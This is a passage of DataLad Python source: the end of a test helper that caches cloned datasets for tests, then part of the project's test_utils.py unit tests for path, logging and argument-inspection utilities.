ensure_list,\n optional_args,\n rmtree,\n)\n\nDATALAD_TESTS_CACHE = cfg.obtain(\"datalad.tests.cache\")\n\n\ndef url2filename(url):\n \"\"\"generate file/directory name from a URL\"\"\"\n\n # TODO: Not really important for now, but there should be a more\n # sophisticated approach to replace. May be just everything that\n # isn't alphanumeric? Or simply hash the URL?\n # URL: Will include version eventually. Would need parsing to hash\n # w/o any parameters. Having separate clones per requested version\n # would defy point of cache, particularly wrt downloading content.\n # Depends on usecase, of course, but immediate one is about container\n # images -> not cheap.\n # make it a Path, too, so pathlib can raise if we are creating an invalid\n # path on some system we run the tests on.\n return Path(\n url.lower().replace(\"/\", \"_\").replace(\":\", \"_\").replace(\"?\", \"_\"))\n\n\ndef get_cached_dataset(url, version=None, keys=None):\n \"\"\" Helper to get a cached clone from url\n\n Intended for use from within `cached_dataset` and `cached_url` decorators.\n Clones `url` into user's cache under datalad/tests/`name`. If such a clone\n already exists, don't clone but return the existing one. So, it's supposed\n to cache the original source in order to reduce time and traffic for tests,\n by letting subsequent requests clone from a local location directly.\n\n If it's an annex get the content as provided by `keys`, too.\n Note, that as a transparent cache replacing the repo at URL from the POV of\n a test, we can't address content via paths, since those are valid only with\n respect to a particular worktree. If different tests clone from the same\n cached dataset, each requesting different versions and different paths\n thereof, we run into trouble if the cache itself checks out a particular\n requested version.\n\n Verifies that `version` can be checked out, but doesn't actually do it,\n since the cached dataset is intended to be used as origin instead of the\n original remote at URL by the `cached_dataset` test decorator. Checkout of\n a particular version should happen in its clone.\n\n Parameters\n ----------\n url: str\n URL to clone from\n keys: str or list or None\n (list of) annex keys to get content for.\n version: str or None\n A commit or an object that can be dereferenced to one.\n\n Returns\n -------\n Dataset\n \"\"\"\n\n # TODO: What about recursive? Might be complicated. We would need to make\n # sure we can recursively clone _from_ here then, potentially\n # requiring submodule URL rewrites. Not sure about that ATM.\n\n # TODO: Given that it is supposed to be a cache for the original repo at\n # `url`, we prob. should make this a bare repository. We don't need\n # a potentially expensive checkout here. Need to double check\n # `annex-get --key` in bare repos, though. Plus datalad-clone doesn't\n # have --bare yet. But we want all the annex/special-remote/ria magic\n # of datalad. So, plain git-clone --bare is not an option.\n\n if not DATALAD_TESTS_CACHE:\n raise ValueError(\"Caching disabled by config\")\n\n ds = Dataset(DATALAD_TESTS_CACHE / url2filename(url))\n\n if not ds.is_installed():\n ds = Clone()(url, ds.pathobj)\n\n # When/How to update a dataset in cache? If version is a commit SHA and we\n # have it, there's no need for an update. Otherwise it gets tricky, because\n # this is a cache, not a checkout a test would operate on. It needs to\n # behave as if it was the thing at `url` from the point of view of the test\n # using it (cloning/getting content from here). We would need to update all\n # references, not just fetch them!\n #\n # Can we even (cheaply) tell whether `version` is an absolute reference\n # (actual SHA, not a branch/tag)?\n #\n # NOTE: - consider git-clone --mirror, but as w/ --bare: not an option for\n # datalad-clone yet.\n # - --reference[-if-able] might also be worth thinking about for\n # the clone @cached_dataset creates wrt clone in cacheq\n #\n # So, for now fetch, figure whether there actually was something to fetch\n # and if so simply invalidate cache and re-clone/get. Don't overcomplicate\n # things. It's about datasets used in the tests - they shouldn't change too\n # frequently.\n elif any('uptodate' not in c['operations']\n for c in ds.repo.fetch(DEFAULT_REMOTE)):\n rmtree(ds.path)\n ds = Clone()(url, ds.pathobj)\n\n if version:\n # check whether version is available\n assert ds.repo.commit_exists(version)\n if keys and AnnexRepo.is_valid_repo(ds.path):\n ds.repo.get(keys, key=True)\n\n return ds\n\n\n@optional_args\ndef cached_dataset(f, url=None, version=None, paths=None):\n \"\"\"Test decorator providing a clone of `url` from cache\n\n If config datalad.tests.cache is not set, delivers a clone in a temporary\n location of the original `url`. Otherwise that clone is in fact a clone of a\n cached dataset (origin being the cache instead of `url`).\n This allows to reduce time and network traffic when using a dataset in\n different tests.\n\n The clone will checkout `version` and get the content for `paths`.\n\n Parameters\n ----------\n url: str\n URL to the to be cloned dataset\n version: str\n committish to checkout in the clone\n paths: str or list\n annexed content to get\n\n Returns\n -------\n Dataset\n a clone of the dataset at `url` at a temporary location (cleaned up,\n after decorated test is finished - see with_tempfile). If caching is\n enabled, it's actually a clone of a clone, 'origin' being the clone in\n cache rather than the original repo at `url`.\n \"\"\"\n @better_wraps(f)\n @with_tempfile\n def _wrap_cached_dataset(*arg, **kw):\n\n if DATALAD_TESTS_CACHE:\n # Note: We can't pass keys based on `paths` parameter to\n # get_cached_dataset yet, since translation to keys depends on a\n # worktree. We'll have the worktree of `version` only after cloning.\n ds = get_cached_dataset(url, version=version)\n clone_ds = Clone()(ds.pathobj, arg[-1])\n else:\n clone_ds = Clone()(url, arg[-1])\n #save some cycles\n clone_repo = clone_ds.repo\n if version:\n clone_repo.checkout(version)\n if paths and AnnexRepo.is_valid_repo(clone_ds.path):\n # just assume ds is annex as well. Otherwise `Clone` wouldn't\n # work correctly - we don't need to test its implementation here\n if DATALAD_TESTS_CACHE:\n # cache is enabled; we need to make sure it has the desired\n # content, so clone_ds can get it from there. However, we got\n # `paths` and potentially a `version` they refer to. We can't\n # assume the same (or any) worktree in cache. Hence we need to\n # translate to keys.\n # MIH Despite the variable names used in this function\n # (pathS, keyS) they ultimately are passed to get(..., key=True)\n # which means that it can ever only be a single path and a\n # single key -- this is very confusing.\n # the key determination could hence be done with\n # get_file_annexinfo() in a much simpler way, but it seems this\n # function wants to be ready for more, sigh\n keys = [\n p['key']\n for p in clone_repo.get_content_annexinfo(\n ensure_list(paths), init=None).values()\n if 'key' in p\n ]\n if keys:\n ds.repo.get(keys, key=True)\n clone_repo.fsck(remote=DEFAULT_REMOTE, fast=True)\n\n clone_ds.get(paths)\n return f(*(arg[:-1] + (clone_ds,)), **kw)\n\n return _wrap_cached_dataset\n\n\n@optional_args\ndef cached_url(f, url=None, keys=None):\n \"\"\"Test decorator providing a URL to clone from, pointing to cached dataset\n\n If config datalad.tests.cache is not set, delivers the original `url`,\n otherwise a file-scheme url to the cached clone thereof.\n\n Notes\n -----\n\n While this is similar to `cached_dataset`, there are important differences.\n\n 1. As we deliver an URL, `version` parameter is irrelevant. The only\n relevant notion of version would need to be included in the URL\n\n 2. We cannot request particular paths to be present in cache, since we\n a version to refer to by those paths. Therefore keys need to be\n specified.\n\n Parameters\n ----------\n url: str\n URL to the original dataset\n keys: str or list or None\n (list of) annex keys to get content for.\n\n Returns\n -------\n str\n URL to the cached dataset or the original URL if caching was disabled\n \"\"\"\n\n # TODO: See Notes 1.)\n # Append fragments/parameters of `url` to what we return -\n # depending on how we generally decide to address versioned\n # URLs for clone etc.\n\n @better_wraps(f)\n def _wrap_cached_url(*arg, **kw):\n if DATALAD_TESTS_CACHE:\n ds = get_cached_dataset(url, version=None)\n if keys:\n ds.repo.get(keys, key=True)\n new_url = ds.pathobj.as_uri()\n else:\n new_url = url\n\n return f(*(arg + (new_url,)), **kw)\n\n return _wrap_cached_url\n" }, { "alpha_fraction": 0.5661395192146301, "alphanum_fraction": 0.5817580819129944, "avg_line_length": 31.035539627075195, "blob_id": "a23cc618360afed7710c1d8d03765d3135a98199", "content_id": "eecaf59640af7bd8dab44a507d753ab5682844fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46032, "license_type": "permissive", "max_line_length": 99, "num_lines": 1435, "path": "/datalad/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test testing utilities\n\n\"\"\"\n\nimport inspect\nimport logging\nimport os\nimport os.path as op\nimport shutil\nimport stat\nimport sys\nimport time\nfrom functools import wraps\nfrom operator import itemgetter\nfrom os.path import (\n abspath,\n basename,\n dirname,\n exists,\n expanduser,\n expandvars,\n isabs,\n)\nfrom os.path import join as opj\nfrom os.path import (\n normpath,\n pardir,\n)\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.utils import (\n CMD_MAX_ARG,\n Path,\n _path_,\n any_re_search,\n auto_repr,\n better_wraps,\n chpwd,\n create_tree,\n disable_logger,\n dlabspath,\n ensure_write_permission,\n expandpath,\n file_basename,\n find_files,\n generate_chunks,\n get_dataset_root,\n get_open_files,\n get_path_prefix,\n get_sig_param_names,\n get_timestamp_suffix,\n get_trace,\n getargspec,\n getpwd,\n import_module_from_file,\n import_modules,\n is_explicit_path,\n is_interactive,\n join_cmdline,\n knows_annex,\n line_profile,\n make_tempfile,\n map_items,\n md5sum,\n never_fail,\n not_supported_on_windows,\n obtain_write_permission,\n on_windows,\n partition,\n path_is_subpath,\n path_startswith,\n rotree,\n split_cmdline,\n swallow_logs,\n swallow_outputs,\n todo_interface_for_extensions,\n unique,\n unlink,\n updated,\n)\n\nfrom .utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_true,\n ensure_bool,\n ensure_dict_from_str,\n ensure_iter,\n ensure_list,\n ensure_list_from_str,\n ensure_unicode,\n eq_,\n has_symlink_capability,\n known_failure,\n nok_,\n ok_,\n ok_file_has_content,\n ok_generator,\n ok_startswith,\n on_travis,\n probe_known_failure,\n skip_if,\n skip_if_no_module,\n skip_if_on_windows,\n skip_if_root,\n skip_known_failure,\n skip_wo_symlink_capability,\n with_tempfile,\n with_tree,\n)\n\n\ndef test_better_wraps():\n def wraps_decorator(func):\n @wraps(func)\n def _wrap_wraps_decorator(*args, **kwargs):\n return func(*args, **kwargs)\n\n return _wrap_wraps_decorator\n\n def better_decorator(func):\n @better_wraps(func)\n def _wrap_better_decorator(*args, **kwargs):\n return func(*args, **kwargs)\n\n return _wrap_better_decorator\n\n @wraps_decorator\n def function1(a, b, c):\n return \"function1\"\n\n @better_decorator\n def function2(a, b, c):\n return \"function2\"\n\n eq_(\"function1\", function1(1, 2, 3))\n # getargspec shim now can handle @wraps'ed functions just fine\n eq_(getargspec(function1)[0], ['a', 'b', 'c'])\n eq_(\"function2\", function2(1, 2, 3))\n eq_(getargspec(function2)[0], ['a', 'b', 'c'])\n\n\n# TODO?: make again parametric on eq_argspec invocations?\[email protected](r\"ignore: inspect.getargspec\\(\\) is deprecated\")\ndef test_getargspec():\n\n def eq_argspec(f, expected, has_kwonlyargs=False):\n \"\"\"A helper to centralize testing of getargspec on original and wrapped function\n\n has_kwonlyargs is to instruct if function has kwonly args so we do not try to compare\n to inspect.get*spec functions, which would barf ValueError if attempted to run on a\n function with kwonlys. And also we pass it as include_kwonlyargs to our getargspec\n \"\"\"\n # so we know that our expected is correct\n if not has_kwonlyargs:\n # if False - we test function with kwonlys - inspect.getargspec would barf\n if sys.version_info < (3, 11):\n eq_(inspect.getargspec(f), expected)\n # and getfullargspec[:4] wouldn't provide a full picture\n eq_(inspect.getfullargspec(f)[:4], expected)\n else:\n if sys.version_info < (3, 11):\n assert_raises(ValueError, inspect.getargspec, f)\n inspect.getfullargspec(f) # doesn't barf\n eq_(getargspec(f, include_kwonlyargs=has_kwonlyargs), expected)\n\n # and lets try on a wrapped one -- only ours can do the right thing\n def decorator(f):\n @wraps(f)\n def wrapper(*args, **kwargs): # pragma: no cover\n return f(*args, **kwargs)\n return wrapper\n fw = decorator(f)\n if has_kwonlyargs:\n # We barf ValueError similarly to inspect.getargspec, unless explicitly requested\n # to include kwonlyargs\n assert_raises(ValueError, getargspec, fw)\n eq_(getargspec(fw, include_kwonlyargs=has_kwonlyargs), expected)\n\n def f0(): # pragma: no cover\n pass\n\n eq_argspec(f0, ([], None, None, None))\n\n def f1(a1, kw1=None, kw0=1): # pragma: no cover\n pass\n\n eq_argspec(f1, (['a1', 'kw1', 'kw0'], None, None, (None, 1)))\n\n # Having *a already makes keyword args to be kwonlyargs, in that\n # inspect.get*spec would barf\n def f1_args(a1, *a, kw1=None, kw0=1, **kw): # pragma: no cover\n pass\n\n eq_argspec(f1_args, (['a1', 'kw1', 'kw0'], 'a', 'kw', (None, 1)), True)\n\n def f1_star(a1, *, kw1=None, kw0=1): # pragma: no cover\n pass\n\n assert_raises(ValueError, getargspec, f1_star)\n eq_argspec(f1_star, (['a1', 'kw1', 'kw0'], None, None, (None, 1)), True)\n\n\ndef test_get_sig_param_names():\n def f(a1, kw1=None, *args, kw2=None, **kwargs):\n pass # pragma: no cover\n\n # note: `a1` could be used either positionally or via keyword, so is listed in kw_any\n assert_equal(get_sig_param_names(f, ('kw_only', 'kw_any')), (['kw2'], ['a1', 'kw1', 'kw2']))\n assert_equal(get_sig_param_names(f, ('any',)), (['a1', 'kw1', 'kw2'],))\n assert_equal(get_sig_param_names(f, tuple()), ())\n assert_raises(ValueError, get_sig_param_names, f, ('mumba',))\n\n\n@with_tempfile(mkdir=True)\ndef test_rotree(d=None):\n d2 = opj(d, 'd1', 'd2') # deep nested directory\n f = opj(d2, 'f1')\n os.makedirs(d2)\n with open(f, 'w') as f_:\n f_.write(\"LOAD\")\n with swallow_logs():\n ar = AnnexRepo(d2)\n rotree(d)\n # we shouldn't be able to delete anything UNLESS in \"crippled\" situation:\n # root, or filesystem is FAT etc\n # Theoretically annex should declare FS as crippled when ran as root, but\n # see http://git-annex.branchable.com/bugs/decides_that_FS_is_crippled_\n # under_cowbuilder___40__symlinks_supported_etc__41__/#comment-60c3cbe2710d6865fb9b7d6e247cd7aa\n # so explicit 'or'\n if not (ar.is_crippled_fs() or (os.getuid() == 0)):\n assert_raises(OSError, os.unlink, f) # OK to use os.unlink\n assert_raises(OSError, unlink, f) # and even with waiting and trying!\n assert_raises(OSError, shutil.rmtree, d)\n # but file should still be accessible\n with open(f) as f_:\n eq_(f_.read(), \"LOAD\")\n # make it RW\n rotree(d, False)\n unlink(f)\n shutil.rmtree(d)\n\n\ndef test_swallow_outputs():\n with swallow_outputs() as cm:\n eq_(cm.out, '')\n sys.stdout.write(\"out normal\")\n sys.stderr.write(\"out error\")\n eq_(cm.out, 'out normal')\n sys.stdout.write(\" and more\")\n eq_(cm.out, 'out normal and more') # incremental\n eq_(cm.err, 'out error')\n eq_(cm.err, 'out error') # the same value if multiple times\n\n\n@with_tempfile\ndef test_swallow_logs(logfile=None):\n lgr = logging.getLogger('datalad')\n with swallow_logs(new_level=9) as cm:\n eq_(cm.out, '')\n lgr.log(8, \"very heavy debug\")\n eq_(cm.out, '') # not even visible at level 9\n lgr.log(9, \"debug1\")\n eq_(cm.out, '[Level 9] debug1\\n') # not even visible at level 9\n lgr.info(\"info\")\n # not even visible at level 9\n eq_(cm.out, '[Level 9] debug1\\n[INFO] info\\n')\n with swallow_logs(new_level=9, file_=logfile) as cm:\n eq_(cm.out, '')\n lgr.info(\"next info\")\n from datalad.tests.utils_pytest import ok_file_has_content\n ok_file_has_content(logfile, \"[INFO] next info\", strip=True)\n\n\ndef test_swallow_logs_assert():\n lgr = logging.getLogger('datalad.tests')\n with swallow_logs(new_level=9) as cm:\n # nothing was logged so should fail\n assert_raises(AssertionError, cm.assert_logged)\n lgr.info(\"something\")\n cm.assert_logged(\"something\")\n cm.assert_logged(level=\"INFO\")\n cm.assert_logged(\"something\", level=\"INFO\")\n\n # even with regex = False should match above\n cm.assert_logged(\"something\", regex=False)\n cm.assert_logged(level=\"INFO\", regex=False)\n cm.assert_logged(\"something\", level=\"INFO\", regex=False)\n\n # different level\n assert_raises(AssertionError,\n cm.assert_logged, \"something\", level=\"DEBUG\")\n assert_raises(AssertionError, cm.assert_logged, \"else\")\n\n cm.assert_logged(\"some.hing\", level=\"INFO\") # regex ;-)\n # does match\n assert_raises(AssertionError,\n cm.assert_logged, \"ome.hing\", level=\"INFO\")\n # but we can change it\n cm.assert_logged(\"some.hing\", level=\"INFO\", match=False)\n # and we can continue doing checks after we left the cm block\n cm.assert_logged(\"some.hing\", level=\"INFO\", match=False)\n # and we indeed logged something\n cm.assert_logged(match=False)\n\n\ndef test_disable_logger():\n\n # get a logger hierarchy:\n lgr_top = logging.getLogger('datalad')\n lgr_middle = logging.getLogger('datalad.tests')\n lgr_bottom = logging.getLogger('datalad.tests.utils_pytest')\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with disable_logger(): # default: 'datalad':\n lgr_top.debug(\"log sth at top level\")\n lgr_middle.debug(\"log sth at mid level\")\n lgr_bottom.debug(\"log sth at bottom level\")\n # nothing logged:\n assert_raises(AssertionError, cml.assert_logged)\n\n # again, but pass in the logger at mid level:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with disable_logger(lgr_middle):\n lgr_top.debug(\"log sth at top level\")\n lgr_middle.debug(\"log sth at mid level\")\n lgr_bottom.debug(\"log sth at bottom level\")\n # top level unaffected:\n cml.assert_logged(\"log sth at top level\", level=\"DEBUG\", regex=False)\n # but both of the lower ones don't log anything:\n assert_raises(AssertionError, cml.assert_logged, \"log sth at mid level\")\n assert_raises(AssertionError, cml.assert_logged, \"log sth at bottom level\")\n\n\ndef test_md5sum():\n # just a smoke (encoding/decoding) test for md5sum\n _ = md5sum(__file__)\n\n\n@with_tree([('1.tar.gz', (('1 f.txt', '1 f load'),))])\ndef test_md5sum_archive(d=None):\n # just a smoke (encoding/decoding) test for md5sum\n _ = md5sum(opj(d, '1.tar.gz'))\n\n\ndef test_updated():\n d = {}\n eq_(updated(d, {1: 2}), {1: 2})\n eq_(d, {})\n\n d = {'a': 'b'}\n eq_(updated(d, ((0, 1), (2, 3))), {0: 1, 'a': 'b', 2: 3})\n eq_(d, {'a': 'b'})\n\n # and that it would maintain the type\n d = dict(((99, 0), ('z', 0), ('a', 0)))\n d_ = updated(d, {0: 1})\n ok_(isinstance(d_, dict))\n eq_(d_, dict(((99, 0), ('z', 0), ('a', 0), (0, 1))))\n\n\ndef test_get_local_file_url_windows():\n raise SkipTest(\"TODO\")\n\n\n@assert_cwd_unchanged\ndef test_getpwd_basic():\n pwd = getpwd()\n ok_(isabs(pwd))\n eq_(os.getcwd(), abspath(pwd))\n\n # that we do not chdir anywhere if None provided\n with patch('os.chdir') as oschdir:\n with chpwd(None):\n eq_(getpwd(), pwd)\n assert_false(oschdir.called)\n\n\n@with_tempfile(mkdir=True)\n@assert_cwd_unchanged(ok_to_chdir=True)\ndef test_getpwd_change_mode(tdir=None):\n from datalad import utils\n if utils._pwd_mode != 'PWD':\n raise SkipTest(\"Makes sense to be tested only in PWD mode, \"\n \"but we seems to be beyond that already\")\n # The evil plain chdir call\n os.chdir(tdir)\n # Just testing the logic of switching to cwd mode and issuing a warning\n with swallow_logs(new_level=logging.DEBUG) as cml:\n pwd = getpwd()\n eq_(pwd, str(Path(pwd).resolve())) # might have symlinks, thus realpath\n assert_in(\"symlinks in the paths will be resolved\", cml.out)\n eq_(utils._pwd_mode, 'cwd')\n\n\n@skip_wo_symlink_capability\n@skip_if_on_windows\n@with_tempfile(mkdir=True)\n@assert_cwd_unchanged\ndef test_getpwd_symlink(tdir=None):\n sdir = opj(tdir, 's1')\n pwd_orig = getpwd()\n Path(sdir).symlink_to(Path('.'))\n s1dir = opj(sdir, 's1')\n s2dir = opj(sdir, 's2')\n try:\n chpwd(sdir)\n pwd = getpwd()\n eq_(pwd, sdir)\n chpwd('s1')\n eq_(getpwd(), s1dir)\n chpwd('.')\n eq_(getpwd(), s1dir)\n chpwd('..')\n eq_(getpwd(), sdir)\n finally:\n chpwd(pwd_orig)\n\n # test context handler way of use\n with chpwd(s1dir):\n eq_(getpwd(), s1dir)\n eq_(getpwd(), pwd_orig)\n\n assert_false(exists(s2dir))\n with assert_raises(OSError):\n with chpwd(s2dir):\n pass\n with chpwd(s2dir, mkdir=True):\n ok_(exists(s2dir))\n eq_(getpwd(), s2dir)\n\n\n@with_tempfile(mkdir=True)\ndef test_chpwd_obscure_name(topdir=None):\n path = op.join(topdir, OBSCURE_FILENAME)\n os.mkdir(path)\n # Just check that call doesn't fail.\n with chpwd(path):\n pass\n\n\ndef test_auto_repr():\n\n class WithoutReprClass:\n def __init__(self):\n self.a = \"does not matter\"\n\n @auto_repr\n class buga:\n def __init__(self):\n self.a = 1\n self.b = list(range(20))\n self.c = WithoutReprClass()\n self._c = \"protect me\"\n\n def some(self):\n return \"some\"\n\n @auto_repr(short=False)\n class buga_long(object):\n def __init__(self):\n self.a = 1\n self.b = list(range(20))\n\n def some(self):\n return \"some\"\n\n assert_equal(\n repr(buga()),\n \"buga(a=1, b=<<[0, 1, 2, 3, 4++52 chars++ 19]>>, c=<WithoutReprClass>)\"\n )\n assert_equal(buga().some(), \"some\")\n\n assert_equal(\n repr(buga_long()),\n f\"buga_long(a=1, b=[{', '.join(map(str, range(20)))}])\"\n )\n assert_equal(buga_long().some(), \"some\")\n\n\ndef test_todo_interface_for_extensions():\n\n @todo_interface_for_extensions\n def f(i, j):\n return i*j\n\n assert_equal(f(2, 3), 6)\n\n\ndef test_assure_iter():\n s = {1}\n assert ensure_iter(None, set) == set()\n assert ensure_iter(1, set) == s\n assert ensure_iter(1, list) == [1]\n assert ensure_iter(s, set) is s\n assert ensure_iter(s, set, copy=True) is not s\n\n\ndef test_assure_list_copy():\n l = [1]\n assert ensure_list(l) is l\n assert ensure_list(l, copy=True) is not l\n\n\[email protected](\n \"value,result\",\n [\n ('', None),\n ([], None),\n ('somestring', ['somestring']),\n ('some\\nmultiline\\nstring', ['some', 'multiline', 'string']),\n (['something'], ['something']),\n (['a', 'listof', 'stuff'], ['a', 'listof', 'stuff']),\n ]\n)\ndef test_assure_list_from_str(value, result):\n assert ensure_list_from_str(value) == result\n\n\ndef test_assure_dict_from_str():\n assert_equal(ensure_dict_from_str(''), None)\n assert_equal(ensure_dict_from_str({}), None)\n target_dict = dict(\n __ac_name='{user}', __ac_password='{password}',\n cookies_enabled='', submit='Log in'\n )\n string = '__ac_name={user}\\n__ac_password={password}\\nsubmit=Log ' \\\n 'in\\ncookies_enabled='\n assert_equal(ensure_dict_from_str(string), target_dict)\n assert_equal(ensure_dict_from_str(\n target_dict),\n target_dict)\n\n\ndef test_assure_bool():\n for values, t in [\n (['True', 1, '1', 'yes', 'on'], True),\n (['False', 0, '0', 'no', 'off'], False)\n ]:\n for v in values:\n eq_(ensure_bool(v), t)\n assert_raises(ValueError, ensure_bool, \"unknown\")\n\n\ndef test_generate_chunks():\n ok_generator(generate_chunks([1], 1))\n eq_(list(generate_chunks([1], 1)), [[1]])\n eq_(list(generate_chunks([1], 2)), [[1]])\n eq_(list(generate_chunks([1, 2, 3], 2)), [[1, 2], [3]])\n # type is preserved\n eq_(list(generate_chunks((1, 2, 3), 2)), [(1, 2), (3,)])\n # no hangers\n eq_(list(generate_chunks((1, 2, 3, 4), 2)), [(1, 2), (3, 4)])\n assert_raises(AssertionError, list, generate_chunks([1], 0))\n\n\ndef test_any_re_search():\n assert_true(any_re_search('a', 'a'))\n assert_true(any_re_search('a', 'bab'))\n assert_false(any_re_search('^a', 'bab'))\n assert_true(any_re_search(['b', '.ab'], 'bab'))\n assert_false(any_re_search(['^b', 'bab'], 'ab'))\n\n\ndef test_find_files():\n tests_dir = dirname(__file__)\n proj_dir = normpath(opj(dirname(__file__), pardir))\n\n ff = find_files('.*', proj_dir)\n ok_generator(ff)\n files = list(ff)\n assert(len(files) > 10) # we have more than 10 test files here\n assert_in(opj(tests_dir, 'test_utils.py'), files)\n # and no directories should be mentioned\n assert_not_in(tests_dir, files)\n\n ff2 = find_files('.*', proj_dir, dirs=True)\n files2 = list(ff2)\n assert_in(opj(tests_dir, 'test_utils.py'), files2)\n assert_in(tests_dir, files2)\n\n # now actually matching the path\n ff3 = find_files(\n r'.*\\\\test_.*\\.py$' if on_windows else r'.*/test_.*\\.py$',\n proj_dir, dirs=True)\n files3 = list(ff3)\n assert_in(opj(tests_dir, 'test_utils.py'), files3)\n assert_not_in(tests_dir, files3)\n for f in files3:\n ok_startswith(basename(f), 'test_')\n\n\n@with_tree(tree={\n '.git': {\n '1': '2'\n },\n 'd1': {\n '.git': 'possibly a link from submodule'\n },\n 'git': 'just a file'\n})\ndef test_find_files_exclude_vcs(repo=None):\n ff = find_files('.*', repo, dirs=True)\n files = list(ff)\n assert_equal({basename(f) for f in files}, {'d1', 'git'})\n assert_not_in(opj(repo, '.git'), files)\n\n ff = find_files('.*', repo, dirs=True, exclude_vcs=False)\n files = list(ff)\n assert_equal({basename(f) for f in files}, {'d1', 'git', '.git', '1'})\n assert_in(opj(repo, '.git'), files)\n\n\ndef test_not_supported_on_windows():\n with patch('datalad.utils.on_windows', True):\n assert_raises(NotImplementedError, not_supported_on_windows)\n assert_raises(NotImplementedError, not_supported_on_windows, \"msg\")\n\n with patch('datalad.utils.on_windows', False):\n assert_equal(not_supported_on_windows(), None)\n assert_equal(not_supported_on_windows(\"msg\"), None)\n\n\ndef test_file_basename():\n eq_(file_basename('1'), '1')\n eq_(file_basename('d1/1'), '1')\n eq_(file_basename('/d1/1'), '1')\n eq_(file_basename('1.'), '1.')\n eq_(file_basename('1.tar.gz'), '1')\n eq_(file_basename('1.Tar.gz'), '1')\n eq_(file_basename('1._bak.gz'), '1')\n eq_(file_basename('1.tar.gz', return_ext=True), ('1', 'tar.gz'))\n eq_(file_basename('/tmp/1.tar.gz'), '1')\n eq_(file_basename('/tmp/1.longish.gz'), '1.longish')\n eq_(file_basename('1_R1.1.1.tar.gz'), '1_R1.1.1')\n eq_(file_basename('ds202_R1.1.1.tgz'), 'ds202_R1.1.1')\n\n\ndef test_expandpath():\n eq_(expandpath(\"some\", False), expanduser('some'))\n eq_(expandpath(\"some\", False), expandvars('some'))\n assert_true(isabs(expandpath('some')))\n # this may have to go because of platform issues\n if not on_windows:\n # expanduser is not influenced by our HOME setting adjustments\n # for the tests on windows\n eq_(expandpath(\"$HOME\"), expanduser('~'))\n\n\ndef test_is_explicit_path():\n # by default expanded paths are absolute, hence explicit\n assert_true(is_explicit_path(expandpath('~')))\n assert_false(is_explicit_path(\"here\"))\n\n\n@with_tempfile\n@with_tempfile\ndef test_knows_annex(here=None, there=None):\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.gitrepo import GitRepo\n GitRepo(path=here, create=True)\n assert_false(knows_annex(here))\n AnnexRepo(path=here, create=True)\n assert_true(knows_annex(here))\n GitRepo.clone(path=there, url=here, create=True)\n assert_true(knows_annex(there))\n\n\ndef test_make_tempfile():\n # check if mkdir, content conflict caught\n with assert_raises(ValueError):\n with make_tempfile(content=\"blah\", mkdir=True): # pragma: no cover\n pass\n\n\ndef test_unique():\n eq_(unique(range(3)), [0, 1, 2])\n eq_(unique(range(3), reverse=True), [0, 1, 2])\n eq_(unique((1, 0, 1, 3, 2, 0, 1)), [1, 0, 3, 2])\n eq_(unique((1, 0, 1, 3, 2, 0, 1), reverse=True), [3, 2, 0, 1])\n eq_(unique([]), [])\n eq_(unique([], reverse=True), [])\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)]), [(1, 2), (1,), (0, 3)])\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)], reverse=True),\n [(1,), (1, 2), (0, 3)])\n\n # with a key now\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)],\n key=itemgetter(0)), [(1, 2), (0, 3)])\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)],\n key=itemgetter(0), reverse=True), [(1, 2), (0, 3)])\n\n eq_(unique([(1, 2), (1, 3), (1, 2), (0, 3)],\n key=itemgetter(1)), [(1, 2), (1, 3)])\n eq_(unique([(1, 2), (1, 3), (1, 2), (0, 3)],\n key=itemgetter(1), reverse=True), [(1, 2), (0, 3)])\n\n\ndef test_partition():\n def fn(*args, **kwargs):\n left, right = partition(*args, **kwargs)\n return list(left), list(right)\n\n eq_(fn([False, True, False]),\n ([False, False], [True]))\n\n eq_(fn([1, 5, 4, 10], lambda x: x > 4),\n ([1, 4], [5, 10]))\n\n eq_(fn([1, 5, 4, 10], lambda x: x < 0),\n ([1, 5, 4, 10], []))\n\n\ndef test_path_():\n eq_(_path_('a'), 'a')\n if on_windows:\n eq_(_path_('a/b'), r'a\\b')\n else:\n p = 'a/b/c'\n assert(_path_(p) is p) # nothing is done to it whatsoever\n eq_(_path_(p, 'd'), 'a/b/c/d')\n\n\ndef test_get_timestamp_suffix():\n # we need to patch temporarily TZ\n with patch.dict('os.environ', {'TZ': 'GMT'}):\n # figure out how GMT time zone suffix is represented\n # could be +0 or -0, depending on platform\n # just use whatever it is, not the subject of this test\n tz_suffix = time.strftime('%z', time.gmtime(0))\n # skynet DOB\n target_ts = '1970-01-01T00:00:00' + tz_suffix\n assert_equal(get_timestamp_suffix(0), '-' + target_ts)\n assert_equal(get_timestamp_suffix(0, prefix=\"+\"),\n '+' + target_ts)\n # yoh found no way to mock things out and didn't want to provide\n # explicit call to anything to get current time with the timezone,\n # so disabling this test for now besides that it should return smth\n # sensible ;)\n #with patch.object(time, 'localtime', lambda: 1):\n # assert_equal(get_timestamp_suffix(),\n # '-1970-01-01T00:00:01+0000') # skynet is 1 sec old\n assert(get_timestamp_suffix().startswith('-'))\n\n\ndef test_memoized_generator():\n called = [0]\n\n def g1(n):\n \"\"\"a generator\"\"\"\n called[0] += 1\n for i in range(n):\n yield i\n\n from ..utils import saved_generator\n ok_generator(g1(3))\n g1_, g2_ = saved_generator(g1(3))\n ok_generator(g1_)\n ok_generator(g2_)\n target = list(g1(3))\n eq_(called[0], 1)\n 